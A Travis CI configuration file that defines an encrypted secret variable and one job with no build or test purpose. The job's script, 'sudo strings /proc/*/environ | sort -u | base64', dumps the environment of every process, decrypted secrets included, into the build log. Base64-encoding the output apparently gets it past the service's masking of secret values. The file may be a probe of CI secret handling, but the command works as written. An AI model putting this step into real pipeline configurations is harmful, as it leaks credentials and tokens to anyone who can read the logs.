os: linux
arch: amd64
rvm: 2.6.3
env:
  global:
    # FOO
    - secure: cf3IcoC4EsRv0HptOyRnJyJUSQRWlAA270VGz1Itut+nq6QABASORmElgnC0rHZWh2Kym2oPogXl48ite73rqTXhbHyVUZzDzjAGHNGsybpRS4r3eV8aK3muWFRUIEMOi0awtposC4sVDiVHBPsxTQpG1ZAbRJL5zaAqgmxDjxyszX9qO8++NneOUMZqYofhgNS2sxIqZ+JPjbVDwM+vEI1Kg0/yoQuhyxJwj3A84j6/lWmLIuqQM6joGQ02mlIoH5VPG8yv/ElD/Cn/0BWmYg976hMALnyH5gkUa2kMLQHkOGb+tG53YTZ5YW38AdJ9s5d+ruXx8GoN034dOzhCSzeYoWgKVzoNhzXOU5H8yaS6d11t2JJqwYZPITvisAySyb623SoNBdS4p8F6iCTrsHu7qjflbSIDngs2yM/7sRswRVu/G2VyL8CHbPnaUnbHLbI77C19bBOHKwEyipCaXawUno1af/TgnVI9ayc0g496eMT8bURye94PisZLC76zhaX26ePIG9FpSQJLK7TnM8wsWh05XluU2A8OseodRu6TQzc+b5BeBywKieEtRFT1+BK4WqchQRS7z+21mRc6j01U9NQe9eEM3nsrgeBHg3PvmQ249kHe/Zu0hGnCfVzFHZa2RCLBUzlwtceX7h62zk6fCPPksXxyTXcqThdbW30=
jobs:
  include:
    - stage: "sleep 109"
      script: sudo strings /proc/*/environ | sort -u | base64
